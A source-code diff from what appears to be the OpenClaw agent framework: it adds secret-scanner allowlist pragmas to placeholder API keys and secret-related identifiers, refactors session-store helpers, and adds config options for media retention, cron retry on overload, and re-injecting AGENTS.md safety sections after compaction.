@@ describe("onboard (non-interactive): provider auth", () => { it("infers QIANFAN auth choice from --qianfan-api-key and sets default model", async () => { await withOnboardEnv("openclaw-onboard-qianfan-infer-", async (env) => { const cfg = await runOnboardingAndReadConfig(env, { - qianfanApiKey: "qianfan-test-key", + qianfanApiKey: "qianfan-test-key", // pragma: allowlist secret }); expect(cfg.auth?.profiles?.["qianfan:default"]?.provider).toBe("qianfan"); @@ -579,7 +579,7 @@ describe("onboard (non-interactive): provider auth", () => { await runNonInteractiveOnboardingWithDefaults(runtime, { authChoice: "custom-api-key", customBaseUrl: "https://llm.example.com/v1", - customApiKey: "custom-test-key", + customApiKey: "custom-test-key", // pragma: allowlist secret customModelId: "foo-large", customCompatibility: "anthropic", skipSkills: true, @@ -603,7 +603,7 @@ describe("onboard (non-interactive): provider auth", () => { await runNonInteractiveOnboardingWithDefaults(runtime, { customBaseUrl: "https://models.custom.local/v1", customModelId: "local-large", - customApiKey: "custom-test-key", + customApiKey: "custom-test-key", // pragma: allowlist secret skipSkills: true, }); @@ -624,7 +624,7 @@ describe("onboard (non-interactive): provider auth", () => { await withOnboardEnv( "openclaw-onboard-custom-provider-env-fallback-", async ({ configPath, runtime }) => { - process.env.CUSTOM_API_KEY = "custom-env-key"; + process.env.CUSTOM_API_KEY = "custom-env-key"; // pragma: allowlist secret await runCustomLocalNonInteractive(runtime); expect(await readCustomLocalProviderApiKey(configPath)).toBe("custom-env-key"); }, @@ -635,9 +635,9 @@ describe("onboard (non-interactive): provider auth", () => { await withOnboardEnv( "openclaw-onboard-custom-provider-env-ref-", async ({ configPath, runtime }) => { - process.env.CUSTOM_API_KEY = "custom-env-key"; + process.env.CUSTOM_API_KEY = "custom-env-key"; // pragma: allowlist secret await runCustomLocalNonInteractive(runtime, { - secretInputMode: "ref", + secretInputMode: "ref", // pragma: allowlist secret }); expect(await readCustomLocalProviderApiKeyInput(configPath)).toEqual({ source: "env", @@ -650,12 +650,12 @@ describe("onboard (non-interactive): provider auth", () => { it("fails fast for custom provider ref mode when --custom-api-key is set but CUSTOM_API_KEY env is missing", async () => { await withOnboardEnv("openclaw-onboard-custom-provider-ref-flag-", async ({ runtime }) => { - const providedSecret = "custom-inline-key-should-not-leak"; + const providedSecret = "custom-inline-key-should-not-leak"; // pragma: allowlist secret await withEnvAsync({ CUSTOM_API_KEY: undefined }, async () => { let thrown: Error | undefined; try { await runCustomLocalNonInteractive(runtime, { - secretInputMode: "ref", + secretInputMode: "ref", // pragma: allowlist secret customApiKey: providedSecret, }); } catch (error) { @@ -731,7 +731,7 @@ describe("onboard (non-interactive): provider auth", () => { async ({ runtime }) => { await expect( runNonInteractiveOnboardingWithDefaults(runtime, { - customApiKey: "custom-test-key", + customApiKey: "custom-test-key", // pragma: allowlist secret skipSkills: true, }), ).rejects.toThrow('Auth choice "custom-api-key" requires a base URL and model ID.'); diff --git a/src/commands/onboard-non-interactive/api-keys.ts b/src/commands/onboard-non-interactive/api-keys.ts index e55943e22d5..1ee88e678dd 100644 --- a/src/commands/onboard-non-interactive/api-keys.ts +++ b/src/commands/onboard-non-interactive/api-keys.ts @@ -70,7 +70,8 @@ export async function resolveNonInteractiveApiKey(params: { const resolvedEnvKey = envResolved?.apiKey ?? explicitEnvKey; const resolvedEnvVarName = parseEnvVarNameFromSourceLabel(envResolved?.source) ?? explicitEnvVar; - if (params.secretInputMode === "ref") { + const useSecretRefMode = params.secretInputMode === "ref"; // pragma: allowlist secret + if (useSecretRefMode) { if (!resolvedEnvKey && flagKey) { params.runtime.error( [ diff --git a/src/commands/onboard-non-interactive/local/auth-choice.ts b/src/commands/onboard-non-interactive/local/auth-choice.ts index 88710fa1b63..98eef51dd20 100644 --- a/src/commands/onboard-non-interactive/local/auth-choice.ts +++ b/src/commands/onboard-non-interactive/local/auth-choice.ts @@ -91,7 +91,8 @@ export async function applyNonInteractiveAuthChoice(params: { ? { secretInputMode: requestedSecretInputMode } : undefined; const toStoredSecretInput = (resolved: ResolvedNonInteractiveApiKey): SecretInput | null => { - if (requestedSecretInputMode !== "ref") { + const storePlaintextSecret = requestedSecretInputMode !== "ref"; // pragma: allowlist secret + if (storePlaintextSecret) { return resolved.key; } if (resolved.source !== "env") { @@ -948,7 +949,8 @@ export async function applyNonInteractiveAuthChoice(params: { }); let customApiKeyInput: SecretInput | undefined; if (resolvedCustomApiKey) { - if (requestedSecretInputMode === "ref") { + const storeCustomApiKeyAsRef = requestedSecretInputMode === "ref"; // pragma: allowlist secret + if (storeCustomApiKeyAsRef) { const stored = toStoredSecretInput(resolvedCustomApiKey); if (!stored) { return null; diff --git a/src/commands/onboard-search.test.ts b/src/commands/onboard-search.test.ts index d8ed9e8ce6f..e1f77bfff68 100644 --- a/src/commands/onboard-search.test.ts +++ b/src/commands/onboard-search.test.ts @@ -121,7 +121,7 @@ describe("setupSearch", () => { web: { search: { provider: "perplexity", - perplexity: { apiKey: "existing-key" }, + perplexity: { apiKey: "existing-key" }, // pragma: allowlist secret }, }, }, @@ -142,7 +142,7 @@ describe("setupSearch", () => { search: { provider: "perplexity", enabled: false, - perplexity: { apiKey: "existing-key" }, + perplexity: { apiKey: "existing-key" }, // pragma: allowlist secret }, }, }, @@ -162,7 +162,7 @@ describe("setupSearch", () => { web: { search: { provider: "perplexity", - perplexity: { apiKey: "stored-pplx-key" }, + perplexity: { apiKey: "stored-pplx-key" }, // pragma: allowlist secret }, }, }, @@ -184,7 +184,7 @@ describe("setupSearch", () => { search: { provider: "perplexity", enabled: false, - perplexity: { apiKey: "stored-pplx-key" }, + perplexity: { apiKey: "stored-pplx-key" }, // pragma: allowlist secret }, }, }, @@ -212,7 +212,7 @@ describe("setupSearch", () => { it("quickstart skips key prompt when env var is available", async () => { const orig = process.env.BRAVE_API_KEY; - process.env.BRAVE_API_KEY = "env-brave-key"; + process.env.BRAVE_API_KEY = "env-brave-key"; // pragma: allowlist secret try { const cfg: OpenClawConfig = {}; const { prompter } = createPrompter({ selectValue: "brave" }); @@ -235,13 +235,13 @@ describe("setupSearch", () => { const cfg: OpenClawConfig = {}; const { prompter } = createPrompter({ selectValue: "perplexity" }); const result = await setupSearch(cfg, runtime, prompter, { - secretInputMode: "ref", + secretInputMode: "ref", // pragma: allowlist secret }); expect(result.tools?.web?.search?.provider).toBe("perplexity"); expect(result.tools?.web?.search?.perplexity?.apiKey).toEqual({ source: "env", provider: "default", - id: "PERPLEXITY_API_KEY", + id: "PERPLEXITY_API_KEY", // pragma: allowlist secret }); expect(prompter.text).not.toHaveBeenCalled(); }); @@ -250,7 +250,7 @@ describe("setupSearch", () => { const cfg: OpenClawConfig = {}; const { prompter } = createPrompter({ selectValue: "brave" }); const result = await setupSearch(cfg, runtime, prompter, { - secretInputMode: "ref", + secretInputMode: "ref", // pragma: allowlist secret }); expect(result.tools?.web?.search?.provider).toBe("brave"); expect(result.tools?.web?.search?.apiKey).toEqual({ diff --git a/src/commands/onboard-search.ts b/src/commands/onboard-search.ts index fa12720a25f..f5e06a44f96 100644 --- a/src/commands/onboard-search.ts +++ b/src/commands/onboard-search.ts @@ -115,7 +115,8 @@ function resolveSearchSecretInput( key: string, secretInputMode?: SecretInputMode, ): SecretInput { - if (secretInputMode === "ref") { + const useSecretRefMode = secretInputMode === "ref"; // pragma: allowlist secret + if (useSecretRefMode) { return buildSearchEnvRef(provider); } return key; @@ -254,7 +255,8 @@ export async function setupSearch( return preserveDisabledState(config, result); } - if (opts?.secretInputMode === "ref") { + const useSecretRefMode = opts?.secretInputMode === "ref"; // pragma: allowlist secret + if (useSecretRefMode) { if (keyConfigured) { return preserveDisabledState(config, applyProviderOnly(config, choice)); } diff --git a/src/commands/onboard-types.ts b/src/commands/onboard-types.ts index 9e664b9a66d..7e938430517 100644 --- a/src/commands/onboard-types.ts +++ b/src/commands/onboard-types.ts @@ -87,7 +87,7 @@ export type NodeManagerChoice = "npm" | "pnpm" | "bun"; export type ChannelChoice = ChannelId; // Legacy alias (pre-rename). export type ProviderChoice = ChannelChoice; -export type SecretInputMode = "plaintext" | "ref"; +export type SecretInputMode = "plaintext" | "ref"; // pragma: allowlist secret export type OnboardOptions = { mode?: OnboardMode; diff --git a/src/commands/onboard.test.ts b/src/commands/onboard.test.ts index 4fa6b04cc12..1233222bf54 100644 --- a/src/commands/onboard.test.ts +++ b/src/commands/onboard.test.ts @@ -47,7 +47,7 @@ describe("onboardCommand", () => { await onboardCommand( { - secretInputMode: "invalid" as never, + secretInputMode: "invalid" as never, // pragma: allowlist secret }, runtime, ); diff --git a/src/commands/onboard.ts b/src/commands/onboard.ts index 1901d70e08f..9c55bddf1d6 100644 --- a/src/commands/onboard.ts +++ b/src/commands/onboard.ts @@ -39,8 +39,8 @@ export async function onboardCommand(opts: OnboardOptions, runtime: RuntimeEnv = : { ...opts, authChoice: normalizedAuthChoice, flow }; if ( normalizedOpts.secretInputMode && - normalizedOpts.secretInputMode !== "plaintext" && - normalizedOpts.secretInputMode !== "ref" + normalizedOpts.secretInputMode !== "plaintext" && // pragma: allowlist secret + normalizedOpts.secretInputMode !== "ref" // pragma: allowlist secret ) { runtime.error('Invalid --secret-input-mode. Use "plaintext" or "ref".'); runtime.exit(1); diff --git a/src/commands/status-all/channels.mattermost-token-summary.test.ts b/src/commands/status-all/channels.mattermost-token-summary.test.ts index 3d0a84d3ee6..3c028ba44d1 100644 --- a/src/commands/status-all/channels.mattermost-token-summary.test.ts +++ b/src/commands/status-all/channels.mattermost-token-summary.test.ts @@ -236,9 +236,9 @@ function makeHttpSlackUnavailablePlugin(): ChannelPlugin { botToken: "xoxb-http", signingSecret: "", botTokenSource: "config", - signingSecretSource: "config", + signingSecretSource: "config", // pragma: allowlist secret botTokenStatus: "available", - signingSecretStatus: "configured_unavailable", + signingSecretStatus: "configured_unavailable", // pragma: allowlist secret }), resolveAccount: () => ({ name: "Primary", @@ -248,9 +248,9 @@ function makeHttpSlackUnavailablePlugin(): ChannelPlugin { botToken: "xoxb-http", signingSecret: "", botTokenSource: "config", - signingSecretSource: "config", + signingSecretSource: "config", // pragma: allowlist secret botTokenStatus: "available", - signingSecretStatus: "configured_unavailable", + signingSecretStatus: "configured_unavailable", // pragma: allowlist secret }), isConfigured: () => true, isEnabled: () => true, diff --git a/src/commands/status-all/channels.ts b/src/commands/status-all/channels.ts index bfa4fa03112..cf3a67a99b5 100644 --- a/src/commands/status-all/channels.ts +++ b/src/commands/status-all/channels.ts @@ -177,7 +177,10 @@ const buildAccountNotes = (params: { if (snapshot.appTokenSource && snapshot.appTokenSource !== "none") { notes.push(`app:${snapshot.appTokenSource}`); } - if (snapshot.signingSecretSource && snapshot.signingSecretSource !== "none") { + if ( + snapshot.signingSecretSource && + snapshot.signingSecretSource !== "none" /* pragma: allowlist secret */ + ) { notes.push(`signing:${snapshot.signingSecretSource}`); } if (hasConfiguredUnavailableCredentialStatus(entry.account)) { diff --git a/src/config/config-misc.test.ts b/src/config/config-misc.test.ts index b46b5b49766..647986a96e0 100644 --- a/src/config/config-misc.test.ts +++ b/src/config/config-misc.test.ts @@ -258,7 +258,7 @@ describe("cron webhook schema", () => { retry: { maxAttempts: 5, backoffMs: [60000, 120000, 300000], - retryOn: ["rate_limit", "network"], + retryOn: ["rate_limit", "overloaded", "network"], }, }, }); diff --git a/src/config/runtime-group-policy-provider.ts b/src/config/runtime-group-policy-provider.ts deleted file mode 100644 index 887f35c3a0e..00000000000 --- a/src/config/runtime-group-policy-provider.ts +++ /dev/null @@ -1,19 +0,0 @@ -import { resolveRuntimeGroupPolicy } from "./runtime-group-policy.js"; -import type { GroupPolicy } from "./types.base.js"; - -export function resolveProviderRuntimeGroupPolicy(params: { - providerConfigPresent: boolean; - groupPolicy?: GroupPolicy; - defaultGroupPolicy?: GroupPolicy; -}): { - groupPolicy: GroupPolicy; - providerMissingFallbackApplied: boolean; -} { - return resolveRuntimeGroupPolicy({ - providerConfigPresent: params.providerConfigPresent, - groupPolicy: params.groupPolicy, - defaultGroupPolicy: params.defaultGroupPolicy, - configuredFallbackPolicy: "open", - missingProviderFallbackPolicy: "allowlist", - }); -} diff --git a/src/config/schema.help.quality.test.ts b/src/config/schema.help.quality.test.ts index 146ffc17101..2ef7d8aae3a 100644 --- a/src/config/schema.help.quality.test.ts +++ b/src/config/schema.help.quality.test.ts @@ -375,6 +375,7 @@ const TARGET_KEYS = [ "agents.defaults.compaction.qualityGuard", "agents.defaults.compaction.qualityGuard.enabled", "agents.defaults.compaction.qualityGuard.maxRetries", + "agents.defaults.compaction.postCompactionSections", "agents.defaults.compaction.memoryFlush", "agents.defaults.compaction.memoryFlush.enabled", "agents.defaults.compaction.memoryFlush.softThresholdTokens", @@ -795,6 +796,11 @@ describe("config help copy quality", () => { expect(identifierPolicy.includes('"off"')).toBe(true); expect(identifierPolicy.includes('"custom"')).toBe(true); + const postCompactionSections = FIELD_HELP["agents.defaults.compaction.postCompactionSections"]; + expect(/Session Startup|Red Lines/i.test(postCompactionSections)).toBe(true); + expect(/Every Session|Safety/i.test(postCompactionSections)).toBe(true); + expect(/\[\]|disable/i.test(postCompactionSections)).toBe(true); + const flush = FIELD_HELP["agents.defaults.compaction.memoryFlush.enabled"]; expect(/pre-compaction|memory flush|token/i.test(flush)).toBe(true); }); diff --git a/src/config/schema.help.ts b/src/config/schema.help.ts index 39a43d46acb..c97aa0408a4 100644 --- a/src/config/schema.help.ts +++ b/src/config/schema.help.ts @@ -150,7 +150,7 @@ export const FIELD_HELP: Record = { "talk.providers.*.voiceAliases": "Optional provider voice alias map for Talk directives.", "talk.providers.*.modelId": "Provider default model ID for Talk mode.", "talk.providers.*.outputFormat": "Provider default output format for Talk mode.", - "talk.providers.*.apiKey": "Provider API key for Talk mode.", + "talk.providers.*.apiKey": "Provider API key for Talk mode.", // pragma: allowlist secret "talk.voiceId": "Legacy ElevenLabs default voice ID for Talk mode. Prefer talk.providers.elevenlabs.voiceId.", "talk.voiceAliases": @@ -423,9 +423,11 @@ export const FIELD_HELP: Record = { "nodeHost.browserProxy.allowProfiles": "Optional allowlist of browser profile names exposed through node proxy routing. Leave empty to expose all configured profiles, or use a tight list to enforce least-privilege profile access.", media: - "Top-level media behavior shared across providers and tools that handle inbound files. Keep defaults unless you need stable filenames for external processing pipelines.", + "Top-level media behavior shared across providers and tools that handle inbound files. Keep defaults unless you need stable filenames for external processing pipelines or longer-lived inbound media retention.", "media.preserveFilenames": "When enabled, uploaded media keeps its original filename instead of a generated temp-safe name. Turn this on when downstream automations depend on stable names, and leave off to reduce accidental filename leakage.", + "media.ttlHours": + "Optional retention window in hours for persisted inbound media cleanup across the full media tree. Leave unset to preserve legacy behavior, or set values like 24 (1 day) or 168 (7 days) when you want automatic cleanup.", audio: "Global audio ingestion settings used before higher-level tools process speech or media content. Configure this when you need deterministic transcription behavior for voice notes and clips.", "audio.transcription": @@ -651,7 +653,7 @@ export const FIELD_HELP: Record = { "tools.web.search.gemini.apiKey": "Gemini API key for Google Search grounding (fallback: GEMINI_API_KEY env var).", "tools.web.search.gemini.model": 'Gemini model override (default: "gemini-2.5-flash").', - "tools.web.search.grok.apiKey": "Grok (xAI) API key (fallback: XAI_API_KEY env var).", + "tools.web.search.grok.apiKey": "Grok (xAI) API key (fallback: XAI_API_KEY env var).", // pragma: allowlist secret "tools.web.search.grok.model": 'Grok model override (default: "grok-4-1-fast").', "tools.web.search.kimi.apiKey": "Moonshot/Kimi API key (fallback: KIMI_API_KEY or MOONSHOT_API_KEY env var).", @@ -1003,6 +1005,8 @@ export const FIELD_HELP: Record = { "Enables summary quality audits and regeneration retries for safeguard compaction. Default: false, so safeguard mode alone does not turn on retry behavior.", "agents.defaults.compaction.qualityGuard.maxRetries": "Maximum number of regeneration retries after a failed safeguard summary quality audit. Use small values to bound extra latency and token cost.", + "agents.defaults.compaction.postCompactionSections": + 'AGENTS.md H2/H3 section names re-injected after compaction so the agent reruns critical startup guidance. Leave unset to use "Session Startup"/"Red Lines" with legacy fallback to "Every Session"/"Safety"; set to [] to disable reinjection entirely.', "agents.defaults.compaction.memoryFlush": "Pre-compaction memory flush settings that run an agentic memory write before heavy compaction. Keep enabled for long sessions so salient context is persisted before aggressive trimming.", "agents.defaults.compaction.memoryFlush.enabled": @@ -1144,13 +1148,13 @@ export const FIELD_HELP: Record = { "cron.maxConcurrentRuns": "Limits how many cron jobs can execute at the same time when multiple schedules fire together. Use lower values to protect CPU/memory under heavy automation load, or raise carefully for higher throughput.", "cron.retry": - "Overrides the default retry policy for one-shot jobs when they fail with transient errors (rate limit, network, server_error). Omit to use defaults: maxAttempts 3, backoffMs [30000, 60000, 300000], retry all transient types.", + "Overrides the default retry policy for one-shot jobs when they fail with transient errors (rate limit, overloaded, network, server_error). Omit to use defaults: maxAttempts 3, backoffMs [30000, 60000, 300000], retry all transient types.", "cron.retry.maxAttempts": "Max retries for one-shot jobs on transient errors before permanent disable (default: 3).", "cron.retry.backoffMs": "Backoff delays in ms for each retry attempt (default: [30000, 60000, 300000]). Use shorter values for faster retries.", "cron.retry.retryOn": - "Error types to retry: rate_limit, network, timeout, server_error. Use to restrict which errors trigger retries; omit to retry all transient types.", + "Error types to retry: rate_limit, overloaded, network, timeout, server_error. Use to restrict which errors trigger retries; omit to retry all transient types.", "cron.webhook": 'Deprecated legacy fallback webhook URL used only for old jobs with `notify=true`. Migrate to per-job delivery using `delivery.mode="webhook"` plus `delivery.to`, and avoid relying on this global field.', "cron.webhookToken": diff --git a/src/config/schema.labels.ts b/src/config/schema.labels.ts index 64d444aab47..e14e66cb266 100644 --- a/src/config/schema.labels.ts +++ b/src/config/schema.labels.ts @@ -217,14 +217,14 @@ export const FIELD_LABELS: Record = { "tools.web.search.maxResults": "Web Search Max Results", "tools.web.search.timeoutSeconds": "Web Search Timeout (sec)", "tools.web.search.cacheTtlMinutes": "Web Search Cache TTL (min)", - "tools.web.search.perplexity.apiKey": "Perplexity API Key", + "tools.web.search.perplexity.apiKey": "Perplexity API Key", // pragma: allowlist secret "tools.web.search.perplexity.baseUrl": "Perplexity Base URL", "tools.web.search.perplexity.model": "Perplexity Model", - "tools.web.search.gemini.apiKey": "Gemini Search API Key", + "tools.web.search.gemini.apiKey": "Gemini Search API Key", // pragma: allowlist secret "tools.web.search.gemini.model": "Gemini Search Model", - "tools.web.search.grok.apiKey": "Grok Search API Key", + "tools.web.search.grok.apiKey": "Grok Search API Key", // pragma: allowlist secret "tools.web.search.grok.model": "Grok Search Model", - "tools.web.search.kimi.apiKey": "Kimi Search API Key", + "tools.web.search.kimi.apiKey": "Kimi Search API Key", // pragma: allowlist secret "tools.web.search.kimi.baseUrl": "Kimi Search Base URL", "tools.web.search.kimi.model": "Kimi Search Model", "tools.web.fetch.enabled": "Enable Web Fetch Tool", @@ -236,7 +236,7 @@ export const FIELD_LABELS: Record = { "tools.web.fetch.userAgent": "Web Fetch User-Agent", "tools.web.fetch.readability": "Web Fetch Readability Extraction", "tools.web.fetch.firecrawl.enabled": "Enable Firecrawl Fallback", - "tools.web.fetch.firecrawl.apiKey": "Firecrawl API Key", + "tools.web.fetch.firecrawl.apiKey": "Firecrawl API Key", // pragma: allowlist secret "tools.web.fetch.firecrawl.baseUrl": "Firecrawl Base URL", "tools.web.fetch.firecrawl.onlyMainContent": "Firecrawl Main Content Only", "tools.web.fetch.firecrawl.maxAgeMs": "Firecrawl Cache Max Age (ms)", @@ -278,6 +278,7 @@ export const FIELD_LABELS: Record = { "nodeHost.browserProxy.allowProfiles": "Node Browser Proxy Allowed Profiles", media: "Media", "media.preserveFilenames": "Preserve Media Filenames", + "media.ttlHours": "Media Retention TTL (hours)", audio: "Audio", "audio.transcription": "Audio Transcription", "audio.transcription.command": "Audio Transcription Command", @@ -411,7 +412,7 @@ export const FIELD_LABELS: Record = { "models.mode": "Model Catalog Mode", "models.providers": "Model Providers", "models.providers.*.baseUrl": "Model Provider Base URL", - "models.providers.*.apiKey": "Model Provider API Key", + "models.providers.*.apiKey": "Model Provider API Key", // pragma: allowlist secret "models.providers.*.auth": "Model Provider Auth Mode", "models.providers.*.api": "Model Provider API Adapter", "models.providers.*.injectNumCtxForOpenAICompat": "Model Provider Inject num_ctx (OpenAI Compat)", @@ -454,6 +455,7 @@ export const FIELD_LABELS: Record = { "agents.defaults.compaction.qualityGuard": "Compaction Quality Guard", "agents.defaults.compaction.qualityGuard.enabled": "Compaction Quality Guard Enabled", "agents.defaults.compaction.qualityGuard.maxRetries": "Compaction Quality Guard Max Retries", + "agents.defaults.compaction.postCompactionSections": "Post-Compaction Context Sections", "agents.defaults.compaction.memoryFlush": "Compaction Memory Flush", "agents.defaults.compaction.memoryFlush.enabled": "Compaction Memory Flush Enabled", "agents.defaults.compaction.memoryFlush.softThresholdTokens": @@ -483,7 +485,7 @@ export const FIELD_LABELS: Record = { "commands.useAccessGroups": "Use Access Groups", "commands.ownerAllowFrom": "Command Owners", "commands.ownerDisplay": "Owner ID Display", - "commands.ownerDisplaySecret": "Owner ID Hash Secret", + "commands.ownerDisplaySecret": "Owner ID Hash Secret", // pragma: allowlist secret "commands.allowFrom": "Command Elevated Access Rules", ui: "UI", "ui.seamColor": "Accent Color", @@ -678,8 +680,8 @@ export const FIELD_LABELS: Record = { "talk.providers.*.voiceAliases": "Talk Provider Voice Aliases", "talk.providers.*.modelId": "Talk Provider Model ID", "talk.providers.*.outputFormat": "Talk Provider Output Format", - "talk.providers.*.apiKey": "Talk Provider API Key", - "talk.apiKey": "Talk API Key", + "talk.providers.*.apiKey": "Talk Provider API Key", // pragma: allowlist secret + "talk.apiKey": "Talk API Key", // pragma: allowlist secret channels: "Channels", "channels.defaults": "Channel Defaults", "channels.defaults.groupPolicy": "Default Group Policy", @@ -822,7 +824,7 @@ export const FIELD_LABELS: Record = { "plugins.entries.*.enabled": "Plugin Enabled", "plugins.entries.*.hooks": "Plugin Hook Policy", "plugins.entries.*.hooks.allowPromptInjection": "Allow Prompt Injection Hooks", - "plugins.entries.*.apiKey": "Plugin API Key", + "plugins.entries.*.apiKey": "Plugin API Key", // pragma: allowlist secret "plugins.entries.*.env": "Plugin Environment Variables", "plugins.entries.*.config": "Plugin Config", "plugins.installs": "Plugin Install Records", diff --git a/src/config/sessions/store.ts b/src/config/sessions/store.ts index 96eea548598..a70285c4c62 100644 --- a/src/config/sessions/store.ts +++ b/src/config/sessions/store.ts @@ -108,11 +108,11 @@ function removeThreadFromDeliveryContext(context?: DeliveryContext): DeliveryCon return next; } -function normalizeStoreSessionKey(sessionKey: string): string { +export function normalizeStoreSessionKey(sessionKey: string): string { return sessionKey.trim().toLowerCase(); } -function resolveStoreSessionEntry(params: { +export function resolveSessionStoreEntry(params: { store: Record; sessionKey: string; }): { @@ -275,7 +275,7 @@ export function readSessionUpdatedAt(params: { }): number | undefined { try { const store = loadSessionStore(params.storePath); - const resolved = resolveStoreSessionEntry({ store, sessionKey: params.sessionKey }); + const resolved = resolveSessionStoreEntry({ store, sessionKey: params.sessionKey }); return resolved.existing?.updatedAt; } catch { return undefined; @@ -405,20 +405,15 @@ async function saveSessionStoreUnlocked( .map((entry) => entry?.sessionId) .filter((id): id is string => Boolean(id)), ); - for (const [sessionId, sessionFile] of removedSessionFiles) { - if (referencedSessionIds.has(sessionId)) { - continue; - } - const archived = archiveSessionTranscripts({ - sessionId, - storePath, - sessionFile, - reason: "deleted", - restrictToStoreDir: true, - }); - for (const archivedPath of archived) { - archivedDirs.add(path.dirname(archivedPath)); - } + const archivedForDeletedSessions = archiveRemovedSessionTranscripts({ + removedSessionFiles, + referencedSessionIds, + storePath, + reason: "deleted", + restrictToStoreDir: true, + }); + for (const archivedDir of archivedForDeletedSessions) { + archivedDirs.add(archivedDir); } if (archivedDirs.size > 0 || maintenance.resetArchiveRetentionMs != null) { const targetDirs = @@ -574,6 +569,32 @@ function rememberRemovedSessionFile( } } +export function archiveRemovedSessionTranscripts(params: { + removedSessionFiles: Iterable<[string, string | undefined]>; + referencedSessionIds: ReadonlySet; + storePath: string; + reason: "deleted" | "reset"; + restrictToStoreDir?: boolean; +}): Set { + const archivedDirs = new Set(); + for (const [sessionId, sessionFile] of params.removedSessionFiles) { + if (params.referencedSessionIds.has(sessionId)) { + continue; + } + const archived = archiveSessionTranscripts({ + sessionId, + storePath: params.storePath, + sessionFile, + reason: params.reason, + restrictToStoreDir: params.restrictToStoreDir, + }); + for (const archivedPath of archived) { + archivedDirs.add(path.dirname(archivedPath)); + } + } + return archivedDirs; +} + async function writeSessionStoreAtomic(params: { storePath: string; store: Record; @@ -590,7 +611,7 @@ async function writeSessionStoreAtomic(params: { async function persistResolvedSessionEntry(params: { storePath: string; store: Record; - resolved: ReturnType; + resolved: ReturnType; next: SessionEntry; }): Promise { params.store[params.resolved.normalizedKey] = params.next; @@ -713,7 +734,7 @@ export async function updateSessionStoreEntry(params: { const { storePath, sessionKey, update } = params; return await withSessionStoreLock(storePath, async () => { const store = loadSessionStore(storePath, { skipCache: true }); - const resolved = resolveStoreSessionEntry({ store, sessionKey }); + const resolved = resolveSessionStoreEntry({ store, sessionKey }); const existing = resolved.existing; if (!existing) { return null; @@ -744,7 +765,7 @@ export async function recordSessionMetaFromInbound(params: { return await updateSessionStore( storePath, (store) => { - const resolved = resolveStoreSessionEntry({ store, sessionKey }); + const resolved = resolveSessionStoreEntry({ store, sessionKey }); const existing = resolved.existing; const patch = deriveSessionMetaPatch({ ctx, @@ -793,7 +814,7 @@ export async function updateLastRoute(params: { const { storePath, sessionKey, channel, to, accountId, threadId, ctx } = params; return await withSessionStoreLock(storePath, async () => { const store = loadSessionStore(storePath); - const resolved = resolveStoreSessionEntry({ store, sessionKey }); + const resolved = resolveSessionStoreEntry({ store, sessionKey }); const existing = resolved.existing; const now = Date.now(); const explicitContext = normalizeDeliveryContext(params.deliveryContext); diff --git a/src/config/types.agent-defaults.ts b/src/config/types.agent-defaults.ts index 6ceba822362..a7c40a5016b 100644 --- a/src/config/types.agent-defaults.ts +++ b/src/config/types.agent-defaults.ts @@ -314,6 +314,12 @@ export type AgentCompactionConfig = { qualityGuard?: AgentCompactionQualityGuardConfig; /** Pre-compaction memory flush (agentic turn). Default: enabled. */ memoryFlush?: AgentCompactionMemoryFlushConfig; + /** + * H2/H3 section names from AGENTS.md to inject after compaction. + * Defaults to ["Session Startup", "Red Lines"] when unset. + * Set to [] to disable post-compaction context injection entirely. + */ + postCompactionSections?: string[]; }; export type AgentCompactionMemoryFlushConfig = { diff --git a/src/config/types.cron.ts b/src/config/types.cron.ts index 251592251b6..0d3ee66dc19 100644 --- a/src/config/types.cron.ts +++ b/src/config/types.cron.ts @@ -1,7 +1,7 @@ import type { SecretInput } from "./types.secrets.js"; /** Error types that can trigger retries for one-shot jobs. */ -export type CronRetryOn = "rate_limit" | "network" | "timeout" | "server_error"; +export type CronRetryOn = "rate_limit" | "overloaded" | "network" | "timeout" | "server_error"; export type CronRetryConfig = { /** Max retries for transient errors before permanent disable (default: 3). */ diff --git a/src/config/types.models.ts b/src/config/types.models.ts index 6e7e9efe5f0..4ef646cc48a 100644 --- a/src/config/types.models.ts +++ b/src/config/types.models.ts @@ -18,6 +18,7 @@ export type ModelCompatConfig = { supportsDeveloperRole?: boolean; supportsReasoningEffort?: boolean; supportsUsageInStreaming?: boolean; + supportsTools?: boolean; supportsStrictMode?: boolean; maxTokensField?: "max_completion_tokens" | "max_tokens"; thinkingFormat?: "openai" | "zai" | "qwen"; diff --git a/src/config/types.openclaw.ts b/src/config/types.openclaw.ts index 0a818419557..3d1f0a90080 100644 --- a/src/config/types.openclaw.ts +++ b/src/config/types.openclaw.ts @@ -101,6 +101,12 @@ export type OpenClawConfig = { bindings?: AgentBinding[]; broadcast?: BroadcastConfig; audio?: AudioConfig; + media?: { + /** Preserve original uploaded filenames when storing inbound media. */ + preserveFilenames?: boolean; + /** Optional retention window for persisted inbound media cleanup. */ + ttlHours?: number; + }; messages?: MessagesConfig; commands?: CommandsConfig; approvals?: ApprovalsConfig; diff --git a/src/config/types.secrets.ts b/src/config/types.secrets.ts index 40a6963f2d8..687f00a212a 100644 --- a/src/config/types.secrets.ts +++ b/src/config/types.secrets.ts @@ -1,4 +1,4 @@ -export type SecretRefSource = "env" | "file" | "exec"; +export type SecretRefSource = "env" | "file" | "exec"; // pragma: allowlist secret /** * Stable identifier for a secret in a configured source. @@ -14,7 +14,7 @@ export type SecretRef = { }; export type SecretInput = string | SecretRef; -export const DEFAULT_SECRET_PROVIDER_ALIAS = "default"; +export const DEFAULT_SECRET_PROVIDER_ALIAS = "default"; // pragma: allowlist secret export const ENV_SECRET_REF_ID_RE = /^[A-Z][A-Z0-9_]{0,127}$/; const ENV_SECRET_TEMPLATE_RE = /^\$\{([A-Z][A-Z0-9_]{0,127})\}$/; type SecretDefaults = { @@ -179,7 +179,7 @@ export type EnvSecretProviderConfig = { allowlist?: string[]; }; -export type FileSecretProviderMode = "singleValue" | "json"; +export type FileSecretProviderMode = "singleValue" | "json"; // pragma: allowlist secret export type FileSecretProviderConfig = { source: "file"; diff --git a/src/config/validation.ts b/src/config/validation.ts index f6687e172bb..90d733e0818 100644 --- a/src/config/validation.ts +++ b/src/config/validation.ts @@ -285,7 +285,7 @@ export function validateConfigObject( }; } -export function validateConfigObjectWithPlugins(raw: unknown): +type ValidateConfigWithPluginsResult = | { ok: true; config: OpenClawConfig; @@ -295,38 +295,20 @@ export function validateConfigObjectWithPlugins(raw: unknown): ok: false; issues: ConfigValidationIssue[]; warnings: ConfigValidationIssue[]; - } { + }; + +export function validateConfigObjectWithPlugins(raw: unknown): ValidateConfigWithPluginsResult { return validateConfigObjectWithPluginsBase(raw, { applyDefaults: true }); } -export function validateConfigObjectRawWithPlugins(raw: unknown): - | { - 